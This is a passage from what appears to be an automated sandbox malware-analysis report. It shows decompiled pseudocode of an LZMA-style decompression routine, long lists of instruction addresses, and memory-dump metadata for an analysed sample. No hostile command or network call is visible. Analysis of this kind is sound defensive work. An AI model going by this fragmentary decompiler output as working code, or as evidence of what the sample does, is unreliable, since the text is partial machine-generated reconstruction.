                                      							while(1) {
                                      								L126:
                                      								__eflags = _v104;
                                      								if(_v104 == 0) {
                                      									break;
                                      								}
                                      								__eax = _v24;
                                      								__eax = _v24 - _v48;
                                      								__eflags = __eax - _v120;
                                      								if(__eax >= _v120) {
                                      									__eax = __eax + _v120;
                                      									__eflags = __eax;
                                      								}
                                      								__edx = _v12;
                                      								__cl =  *(__edx + __eax);
                                      								__eax = _v24;
                                      								_v96 = __cl;
                                      								 *(__edx + __eax) = __cl;
                                      								__eax = __eax + 1;
                                      								__edx = 0;
                                      								_t420 = __eax % _v120;
                                      								__eax = __eax / _v120;
                                      								__edx = _t420;
                                      								__eax = _v108;
                                      								_v108 = _v108 + 1;
                                      								_v104 = _v104 - 1;
                                      								_v52 = _v52 - 1;
                                      								__eflags = _v52;
                                      								 *_v108 = __cl;
                                      								_v24 = _t420;
                                      								if(_v52 > 0) {
                                      									continue;
                                      								} else {
                                      									L83:
                                      									_v140 = 2;
                                      									goto L3;
                                      								}
                                      							}
                                      							_v140 = 0x1c;
                                      							L173:
                                      							_push(0x22);
                                      							_pop(_t574);
                                      							memcpy(_v148,  &_v140, _t574 << 2);
                                      							return 0;
                                      					}
                                      				}
                                      				L174:
                                      				_t538 = _t537 | 0xffffffff;
                                      				return _t538;
                                      			}










































                                      0x00406bc0
                                      0x00406bc7
                                      0x00406bcd
                                      0x00406bd3
                                      0x00000000
                                      0x00406bd7
                                      0x00406be3
                                      0x00406be3
                                      0x00406be3
                                      0x00406bec
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x00000000
                                      0x00406bf9
                                      0x00406bfd
                                      0x00000000
                                      0x00000000
                                      0x00406c06
                                      0x00406c09
                                      0x00406c0c
                                      0x00406c0e
                                      0x00406c10
                                      0x00000000
                                      0x00000000
                                      0x00406c16
                                      0x00406c19
                                      0x00406c1b
                                      0x00406c1c
                                      0x00406c1f
                                      0x00406c21
                                      0x00406c22
                                      0x00406c24
                                      0x00406c27
                                      0x00406c2c
                                      0x00406c31
                                      0x00406c3a
                                      0x00406c4d
                                      0x00406c50
                                      0x00406c59
                                      0x00406c5c
                                      0x00406c84
                                      0x00406c84
                                      0x00406c86
                                      0x00406c94
                                      0x00406c94
                                      0x00406c98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406c88
                                      0x00406c88
                                      0x00406c8b
                                      0x00406c8b
                                      0x00406c8c
                                      0x00406c8c
                                      0x00000000
                                      0x00406c88
                                      0x00406c5e
                                      0x00406c62
                                      0x00406c67
                                      0x00406c67
                                      0x00406c70
                                      0x00406c76
                                      0x00406c78
                                      0x00406c7b
                                      0x00000000
                                      0x00406c81
                                      0x00406c81
                                      0x00000000
                                      0x00406c81
                                      0x00000000
                                      0x00406c9e
                                      0x00406c9e
                                      0x00406ca2
                                      0x0040754e
                                      0x00000000
                                      0x0040754e
                                      0x00406cab
                                      0x00406cbb
                                      0x00406cbe
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc4
                                      0x00406cc4
                                      0x00406cc8
                                      0x00000000
                                      0x00000000
                                      0x00406cca
                                      0x00406ccd
                                      0x00406cd0
                                      0x00406cfa
                                      0x00406d00
                                      0x00406d07
                                      0x00000000
                                      0x00406d07
                                      0x00406cd2
                                      0x00406cd6
                                      0x00406cd9
                                      0x00406cde
                                      0x00406cde
                                      0x00406ce9
                                      0x00406cef
                                      0x00406cf1
                                      0x00406cf4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d39
                                      0x00406d3f
                                      0x00406d42
                                      0x00406d4f
                                      0x00406d57
                                      0x00000000
                                      0x00000000
                                      0x00406d0e
                                      0x00406d0e
                                      0x00406d12
                                      0x0040755d
                                      0x00000000
                                      0x0040755d
                                      0x00406d1e
                                      0x00406d29
                                      0x00406d29
                                      0x00406d29
                                      0x00406d2c
                                      0x00406d2f
                                      0x00406d32
                                      0x00406d35
                                      0x00406d37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073dd
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x00407413
                                      0x0040741a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040741c
                                      0x0040741c
                                      0x00407420
                                      0x004075cf
                                      0x00000000
                                      0x004075cf
                                      0x0040742c
                                      0x00407433
                                      0x0040743b
                                      0x0040743b
                                      0x0040743b
                                      0x0040743e
                                      0x00407441
                                      0x00407441
                                      0x00000000
                                      0x00000000
                                      0x00406d5f
                                      0x00406d61
                                      0x00406d64
                                      0x00406dd5
                                      0x00406dd8
                                      0x00406ddb
                                      0x00406de2
                                      0x00406dec
                                      0x00000000
                                      0x00406dec
                                      0x00406d66
                                      0x00406d6a
                                      0x00406d6d
                                      0x00406d6f
                                      0x00406d72
                                      0x00406d75
                                      0x00406d77
                                      0x00406d7a
                                      0x00406d7c
                                      0x00406d81
                                      0x00406d84
                                      0x00406d87
                                      0x00406d8b
                                      0x00406d92
                                      0x00406d95
                                      0x00406d9c
                                      0x00406da0
                                      0x00406da8
                                      0x00406da8
                                      0x00406da8
                                      0x00406da2
                                      0x00406da2
                                      0x00406da2
                                      0x00406d97
                                      0x00406d97
                                      0x00406d97
                                      0x00406dac
                                      0x00406daf
                                      0x00406dcd
                                      0x00406dcf
                                      0x00000000
                                      0x00406dcf
                                      0x00406db1
                                      0x00406db4
                                      0x00406db7
                                      0x00406dba
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbf
                                      0x00406dc2
                                      0x00406dc4
                                      0x00406dc5
                                      0x00406dc8
                                      0x00000000
                                      0x00000000
                                      0x00406ffe
                                      0x00407002
                                      0x00407020
                                      0x00407023
                                      0x0040702a
                                      0x0040702d
                                      0x00407030
                                      0x00407033
                                      0x00407036
                                      0x00407039
                                      0x0040703b
                                      0x00407042
                                      0x00407043
                                      0x00407045
                                      0x00407048
                                      0x0040704b
                                      0x0040704e
                                      0x0040704e
                                      0x00407053
                                      0x00000000
                                      0x00407053
                                      0x00407004
                                      0x00407007
                                      0x0040700a
                                      0x00407014
                                      0x00000000
                                      0x00000000
                                      0x00407068
                                      0x0040706c
                                      0x0040708f
                                      0x00407092
                                      0x00407095
                                      0x0040709f
                                      0x0040706e
                                      0x0040706e
                                      0x00407071
                                      0x00407074
                                      0x00407077
                                      0x00407084
                                      0x00407087
                                      0x00407087
                                      0x00000000
                                      0x00000000
                                      0x004070ab
                                      0x004070af
                                      0x00000000
                                      0x00000000
                                      0x004070b5
                                      0x004070b9
                                      0x00000000
                                      0x00000000
                                      0x004070bf
                                      0x004070c1
                                      0x004070c5
                                      0x004070c5
                                      0x004070c8
                                      0x004070cc
                                      0x00000000
                                      0x00000000
                                      0x0040711c
                                      0x00407120
                                      0x00407127
                                      0x0040712a
                                      0x0040712d
                                      0x00407137
                                      0x00000000
                                      0x00407137
                                      0x00407122
                                      0x00000000
                                      0x00000000
                                      0x00407143
                                      0x00407147
                                      0x0040714e
                                      0x00407151
                                      0x00407154
                                      0x00407149
                                      0x00407149
                                      0x00407149
                                      0x00407157
                                      0x0040715a
                                      0x0040715d
                                      0x0040715d
                                      0x00407160
                                      0x00407163
                                      0x00407166
                                      0x00407166
                                      0x00407169
                                      0x00407170
                                      0x00407175
                                      0x00000000
                                      0x00000000
                                      0x00407203
                                      0x00407203
                                      0x00407207
                                      0x004075a5
                                      0x00000000
                                      0x004075a5
                                      0x0040720d
                                      0x00407210
                                      0x00407213
                                      0x00407217
                                      0x0040721a
                                      0x00407220
                                      0x00407222
                                      0x00407222
                                      0x00407222
                                      0x00407225
                                      0x00407228
                                      0x00000000
                                      0x00000000
                                      0x00406df8
                                      0x00406df8
                                      0x00406dfc
                                      0x00407569
                                      0x00000000
                                      0x00407569
                                      0x00406e02
                                      0x00406e05
                                      0x00406e08
                                      0x00406e0c
                                      0x00406e0f
                                      0x00406e15
                                      0x00406e17
                                      0x00406e17
                                      0x00406e17
                                      0x00406e1a
                                      0x00406e1d
                                      0x00406e1d
                                      0x00406e20
                                      0x00406e23
                                      0x00000000
                                      0x00000000
                                      0x00406e29
                                      0x00406e2f
                                      0x00000000
                                      0x00000000
                                      0x00406e35
                                      0x00406e35
                                      0x00406e39
                                      0x00406e3c
                                      0x00406e3f
                                      0x00406e42
                                      0x00406e45
                                      0x00406e46
                                      0x00406e49
                                      0x00406e4b
                                      0x00406e51
                                      0x00406e54
                                      0x00406e57
                                      0x00406e5a
                                      0x00406e5d
                                      0x00406e60
                                      0x00406e63
                                      0x00406e7f
                                      0x00406e82
                                      0x00406e85
                                      0x00406e88
                                      0x00406e8f
                                      0x00406e93
                                      0x00406e95
                                      0x00406e99
                                      0x00406e65
                                      0x00406e65
                                      0x00406e69
                                      0x00406e71
                                      0x00406e76
                                      0x00406e78
                                      0x00406e7a
                                      0x00406e7a
                                      0x00406e9c
                                      0x00406ea3
                                      0x00406ea6
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eb1
                                      0x00406eb1
                                      0x00406eb5
                                      0x00407575
                                      0x00000000
                                      0x00407575
                                      0x00406ebb
                                      0x00406ebe
                                      0x00406ec1
                                      0x00406ec5
                                      0x00406ec8
                                      0x00406ece
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed3
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00406ede
                                      0x00406ee1
                                      0x00406ee4
                                      0x00406ee7
                                      0x00406eea
                                      0x00406eed
                                      0x00406ef0
                                      0x00406ef3
                                      0x00406ef6
                                      0x00406ef9
                                      0x00406efc
                                      0x00406f14
                                      0x00406f17
                                      0x00406f1a
                                      0x00406f1d
                                      0x00406f1d
                                      0x00406f20
                                      0x00406f24
                                      0x00406f26
                                      0x00406efe
                                      0x00406efe
                                      0x00406f06
                                      0x00406f0b
                                      0x00406f0d
                                      0x00406f0f
                                      0x00406f0f
                                      0x00406f29
                                      0x00406f30
                                      0x00406f33
                                      0x00000000
                                      0x00406f35
                                      0x00000000
                                      0x00406f35
                                      0x00406f33
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00000000
                                      0x00000000
                                      0x00406f75
                                      0x00406f75
                                      0x00406f79
                                      0x00407581
                                      0x00000000
                                      0x00407581
                                      0x00406f7f
                                      0x00406f82
                                      0x00406f85
                                      0x00406f89
                                      0x00406f8c
                                      0x00406f92
                                      0x00406f94
                                      0x00406f94
                                      0x00406f94
                                      0x00406f97
                                      0x00406f9a
                                      0x00406f9a
                                      0x00406fa0
                                      0x00406f3e
                                      0x00406f3e
                                      0x00406f41
                                      0x00000000
                                      0x00406f41
                                      0x00406fa2
                                      0x00406fa2
                                      0x00406fa5
                                      0x00406fa8
                                      0x00406fab
                                      0x00406fae
                                      0x00406fb1
                                      0x00406fb4
                                      0x00406fb7
                                      0x00406fba
                                      0x00406fbd
                                      0x00406fc0
                                      0x00406fd8
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fe1
                                      0x00406fe1
                                      0x00406fe4
                                      0x00406fe8
                                      0x00406fea
                                      0x00406fc2
                                      0x00406fc2
                                      0x00406fca
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd3
                                      0x00406fd3
                                      0x00406fed
                                      0x00406ff4
                                      0x00406ff7
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00407286
                                      0x00407286
                                      0x0040728a
                                      0x004075b1
                                      0x00000000
                                      0x004075b1
                                      0x00407290
                                      0x00407293
                                      0x00407296
                                      0x0040729a
                                      0x0040729d
                                      0x004072a3
                                      0x004072a5
                                      0x004072a5
                                      0x004072a5
                                      0x004072a8
                                      0x00000000
                                      0x00000000
                                      0x00407056
                                      0x00407056
                                      0x00407059
                                      0x00000000
                                      0x00000000
                                      0x00407395
                                      0x00407399
                                      0x004073bb
                                      0x004073be
                                      0x004073c8
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x0040739b
                                      0x0040739e
                                      0x004073a2
                                      0x004073a5
                                      0x004073a5
                                      0x004073a8
                                      0x00000000
                                      0x00000000
                                      0x00407452
                                      0x00407456
                                      0x00407474
                                      0x00407474
                                      0x00407474
                                      0x0040747b
                                      0x00407482
                                      0x00407489
                                      0x00407489
                                      0x00000000
                                      0x00407489
                                      0x00407458
                                      0x0040745b
                                      0x0040745e
                                      0x00407461
                                      0x00407468
                                      0x004073ac
                                      0x004073ac
                                      0x004073af
                                      0x00000000
                                      0x00000000
                                      0x00407543
                                      0x00407546
                                      0x00000000
                                      0x00000000
                                      0x0040717d
                                      0x0040717f
                                      0x00407186
                                      0x00407187
                                      0x00407189
                                      0x0040718c
                                      0x00000000
                                      0x00000000
                                      0x00407194
                                      0x00407197
                                      0x0040719a
                                      0x0040719c
                                      0x0040719e
                                      0x0040719e
                                      0x0040719f
                                      0x004071a2
                                      0x004071a9
                                      0x004071ac
                                      0x004071ba
                                      0x00000000
                                      0x00000000
                                      0x00407490
                                      0x00407490
                                      0x00407493
                                      0x0040749a
                                      0x00000000
                                      0x00000000
                                      0x0040749f
                                      0x0040749f
                                      0x004074a3
                                      0x004075db
                                      0x00000000
                                      0x004075db
                                      0x004074a9
                                      0x004074ac
                                      0x004074af
                                      0x004074b3
                                      0x004074b6
                                      0x004074bc
                                      0x004074be
                                      0x004074be
                                      0x004074be
                                      0x004074c1
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c7
                                      0x004074c7
                                      0x004074cb
                                      0x0040752b
                                      0x0040752e
                                      0x00407533
                                      0x00407534
                                      0x00407536
                                      0x00407538
                                      0x0040753b
                                      0x00407447
                                      0x00407447
                                      0x00000000
                                      0x00407447
                                      0x004074cd
                                      0x004074d3
                                      0x004074d6
                                      0x004074d9
                                      0x004074dc
                                      0x004074df
                                      0x004074e2
                                      0x004074e5
                                      0x004074e8
                                      0x004074eb
                                      0x004074ee
                                      0x00407507
                                      0x0040750a
                                      0x0040750d
                                      0x00407510
                                      0x00407514
                                      0x00407516
                                      0x00407516
                                      0x00407517
                                      0x0040751a
                                      0x004074f0
                                      0x004074f0
                                      0x004074f8
                                      0x004074fd
                                      0x004074ff
                                      0x00407502
                                      0x00407502
                                      0x0040751d
                                      0x00407524
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x004071c2
                                      0x004071c5
                                      0x004071fb
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732e
                                      0x0040732e
                                      0x00407331
                                      0x00407333
                                      0x004075bd
                                      0x00000000
                                      0x004075bd
                                      0x00407339
                                      0x0040733c
                                      0x00000000
                                      0x00000000
                                      0x00407342
                                      0x00407346
                                      0x00407349
                                      0x00407349
                                      0x00407349
                                      0x00000000
                                      0x00407349
                                      0x004071c7
                                      0x004071c9
                                      0x004071cb
                                      0x004071cd
                                      0x004071d0
                                      0x004071d1
                                      0x004071d3
                                      0x004071d5
                                      0x004071d8
                                      0x004071db
                                      0x004071f1
                                      0x004071f6
                                      0x0040722e
                                      0x0040722e
                                      0x00407232
                                      0x0040725e
                                      0x00407260
                                      0x00407267
                                      0x0040726a
                                      0x0040726d
                                      0x0040726d
                                      0x00407272
                                      0x00407272
                                      0x00407274
                                      0x00407277
                                      0x0040727e
                                      0x00407281
                                      0x004072ae
                                      0x004072ae
                                      0x004072b1
                                      0x004072b4
                                      0x00407328
                                      0x00407328
                                      0x00407328
                                      0x00000000
                                      0x00407328
                                      0x004072b6
                                      0x004072bc
                                      0x004072bf
                                      0x004072c2
                                      0x004072c5
                                      0x004072c8
                                      0x004072cb
                                      0x004072ce
                                      0x004072d1
                                      0x004072d4
                                      0x004072d7
                                      0x004072f0
                                      0x004072f2
                                      0x004072f5
                                      0x004072f6
                                      0x004072f9
                                      0x004072fb
                                      0x004072fe
                                      0x00407300
                                      0x00407302
                                      0x00407305
                                      0x00407307
                                      0x0040730a
                                      0x0040730e
                                      0x00407310
                                      0x00407310
                                      0x00407311
                                      0x00407314
                                      0x00407317
                                      0x004072d9
                                      0x004072d9
                                      0x004072e1
                                      0x004072e6
                                      0x004072e8
                                      0x004072eb
                                      0x004072eb
                                      0x0040731a
                                      0x00407321
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x00000000
                                      0x00407323
                                      0x00000000
                                      0x00407323
                                      0x00407321
                                      0x00407234
                                      0x00407237
                                      0x00407239
                                      0x0040723c
                                      0x0040723f
                                      0x00407242
                                      0x00407244
                                      0x00407247
                                      0x0040724a
                                      0x0040724a
                                      0x0040724d
                                      0x0040724d
                                      0x00407250
                                      0x00407257
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x00000000
                                      0x00407259
                                      0x00000000
                                      0x00407259
                                      0x00407257
                                      0x004071dd
                                      0x004071e0
                                      0x004071e2
                                      0x004071e5
                                      0x00000000
                                      0x00000000
                                      0x00406f44
                                      0x00406f44
                                      0x00406f48
                                      0x0040758d
                                      0x00000000
                                      0x0040758d
                                      0x00406f4e
                                      0x00406f51
                                      0x00406f54
                                      0x00406f57
                                      0x00406f5a
                                      0x00406f5d
                                      0x00406f60
                                      0x00406f62
                                      0x00406f65
                                      0x00406f68
                                      0x00406f6b
                                      0x00406f6d
                                      0x00406f6d
                                      0x00406f6d
                                      0x00000000
                                      0x00000000
                                      0x004070cf
                                      0x004070cf
                                      0x004070d3
                                      0x00407599
                                      0x00000000
                                      0x00407599
                                      0x004070d9
                                      0x004070dc
                                      0x004070df
                                      0x004070e2
                                      0x004070e4
                                      0x004070e4
                                      0x004070e4
                                      0x004070e7
                                      0x004070ea
                                      0x004070ed
                                      0x004070f0
                                      0x004070f3
                                      0x004070f6
                                      0x004070f7
                                      0x004070f9
                                      0x004070f9
                                      0x004070f9
                                      0x004070fc
                                      0x004070ff
                                      0x00407102
                                      0x00407105
                                      0x00407105
                                      0x00407105
                                      0x00407108
                                      0x0040710a
                                      0x0040710a
                                      0x00000000
                                      0x00000000
                                      0x0040734c
                                      0x0040734c
                                      0x0040734c
                                      0x00407350
                                      0x00000000
                                      0x00000000
                                      0x00407356
                                      0x00407359
                                      0x0040735c
                                      0x0040735f
                                      0x00407361
                                      0x00407361
                                      0x00407361
                                      0x00407364
                                      0x00407367
                                      0x0040736a
                                      0x0040736d
                                      0x00407370
                                      0x00407373
                                      0x00407374
                                      0x00407376
                                      0x00407376
                                      0x00407376
                                      0x00407379
                                      0x0040737c
                                      0x0040737f
                                      0x00407382
                                      0x00407385
                                      0x00407389
                                      0x0040738b
                                      0x0040738e
                                      0x00000000
                                      0x00407390
                                      0x0040710d
                                      0x0040710d
                                      0x00000000
                                      0x0040710d
                                      0x0040738e
                                      0x004075c3
                                      0x004075e5
                                      0x004075eb
                                      0x004075ed
                                      0x004075f4
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x004075fa
                                      0x004075fa
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                      • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                      • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                      • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E00406FFE() {
                                      				signed int _t539;
                                      				unsigned short _t540;
                                      				signed int _t541;
                                      				void _t542;
                                      				signed int _t543;
                                      				signed int _t544;
                                      				signed int _t573;
                                      				signed int _t576;
                                      				signed int _t597;
                                      				signed int* _t614;
                                      				void* _t621;
                                      
                                      				L0:
                                      				while(1) {
                                      					L0:
                                      					if( *(_t621 - 0x40) != 1) {
                                      						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                      						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                      						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                      						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                      						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                      						_t539 =  *(_t621 - 4) + 0x664;
                                      						 *(_t621 - 0x58) = _t539;
                                      						goto L68;
                                      					} else {
                                      						 *(__ebp - 0x84) = 8;
                                      						while(1) {
                                      							L132:
                                      							 *(_t621 - 0x54) = _t614;
                                      							while(1) {
                                      								L133:
                                      								_t540 =  *_t614;
                                      								_t597 = _t540 & 0x0000ffff;
                                      								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                      								if( *(_t621 - 0xc) >= _t573) {
                                      									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                      									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                      									 *(_t621 - 0x40) = 1;
                                      									_t541 = _t540 - (_t540 >> 5);
                                      									 *_t614 = _t541;
                                      								} else {
                                      									 *(_t621 - 0x10) = _t573;
                                      									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                      									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                      								}
                                      								if( *(_t621 - 0x10) >= 0x1000000) {
                                      									goto L139;
                                      								}
                                      								L137:
                                      								if( *(_t621 - 0x6c) == 0) {
                                      									 *(_t621 - 0x88) = 5;
                                      									L170:
                                      									_t576 = 0x22;
                                      									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                      									_t544 = 0;
                                      									L172:
                                      									return _t544;
                                      								}
                                      								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                      								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                      								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                      								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                      								L139:
                                      								_t542 =  *(_t621 - 0x84);
                                      								while(1) {
                                      									 *(_t621 - 0x88) = _t542;
                                      									while(1) {
                                      										L1:
                                      										_t543 =  *(_t621 - 0x88);
                                      										if(_t543 > 0x1c) {
                                      											break;
                                      										}
                                      										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                      											case 0:
                                      												if( *(_t621 - 0x6c) == 0) {
                                      													goto L170;
                                      												}
                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                      												_t543 =  *( *(_t621 - 0x70));
                                      												if(_t543 > 0xe1) {
                                      													goto L171;
                                      												}
                                      												_t547 = _t543 & 0x000000ff;
                                      												_push(0x2d);
                                      												asm("cdq");
                                      												_pop(_t578);
                                      												_push(9);
                                      												_pop(_t579);
                                      												_t617 = _t547 / _t578;
                                      												_t549 = _t547 % _t578 & 0x000000ff;
                                      												asm("cdq");
                                      												_t612 = _t549 % _t579 & 0x000000ff;
                                      												 *(_t621 - 0x3c) = _t612;
                                      												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                      												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                      												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                      												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                      													L10:
                                      													if(_t620 == 0) {
                                      														L12:
                                      														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                      														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                      														goto L15;
                                      													} else {
                                      														goto L11;
                                      													}
                                      													do {
                                      														L11:
                                      														_t620 = _t620 - 1;
                                      														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                      													} while (_t620 != 0);
                                      													goto L12;
                                      												}
                                      												if( *(_t621 - 4) != 0) {
                                      													GlobalFree( *(_t621 - 4));
                                      												}
                                      												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                      												 *(_t621 - 4) = _t543;
                                      												if(_t543 == 0) {
                                      													goto L171;
                                      												} else {
                                      													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                      													goto L10;
                                      												}
                                      											case 1:
                                      												L13:
                                      												__eflags =  *(_t621 - 0x6c);
                                      												if( *(_t621 - 0x6c) == 0) {
                                      													 *(_t621 - 0x88) = 1;
                                      													goto L170;
                                      												}
                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                      												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                      												_t45 = _t621 - 0x48;
                                      												 *_t45 =  *(_t621 - 0x48) + 1;
                                      												__eflags =  *_t45;
                                      												L15:
                                      												if( *(_t621 - 0x48) < 4) {
                                      													goto L13;
                                      												}
                                      												_t555 =  *(_t621 - 0x40);
                                      												if(_t555 ==  *(_t621 - 0x74)) {
                                      													L20:
                                      													 *(_t621 - 0x48) = 5;
                                      													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                      													goto L23;
                                      												}
                                      												 *(_t621 - 0x74) = _t555;
                                      												if( *(_t621 - 8) != 0) {
                                      													GlobalFree( *(_t621 - 8));
                                      												}
                                      												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                      												 *(_t621 - 8) = _t543;
                                      												if(_t543 == 0) {
                                      													goto L171;
                                      												} else {
                                      													goto L20;
                                      												}
                                      											case 2:
                                      												L24:
                                      												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                      												 *(_t621 - 0x84) = 6;
                                      												 *(_t621 - 0x4c) = _t562;
                                      												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                      												goto L132;
                                      											case 3:
                                      												L21:
                                      												__eflags =  *(_t621 - 0x6c);
                                      												if( *(_t621 - 0x6c) == 0) {
                                      													 *(_t621 - 0x88) = 3;
                                      													goto L170;
                                      												}
                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                      												_t67 = _t621 - 0x70;
                                      												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                      												__eflags =  *_t67;
                                      												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                      												L23:
                                      												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                      												if( *(_t621 - 0x48) != 0) {
                                      													goto L21;
                                      												}
                                      												goto L24;
                                      											case 4:
                                      												L133:
                                      												_t540 =  *_t614;
                                      												_t597 = _t540 & 0x0000ffff;
                                      												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                      												if( *(_t621 - 0xc) >= _t573) {
                                      													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                      													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                      													 *(_t621 - 0x40) = 1;
                                      													_t541 = _t540 - (_t540 >> 5);
                                      													 *_t614 = _t541;
                                      												} else {
                                      													 *(_t621 - 0x10) = _t573;
                                      													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                      													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                      												}
                                      												if( *(_t621 - 0x10) >= 0x1000000) {
                                      													goto L139;
                                      												}
                                      											case 5:
                                      												goto L137;
                                      											case 6:
                                      												__edx = 0;
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													__eax =  *(__ebp - 4);
                                      													__ecx =  *(__ebp - 0x38);
                                      													 *(__ebp - 0x34) = 1;
                                      													 *(__ebp - 0x84) = 7;
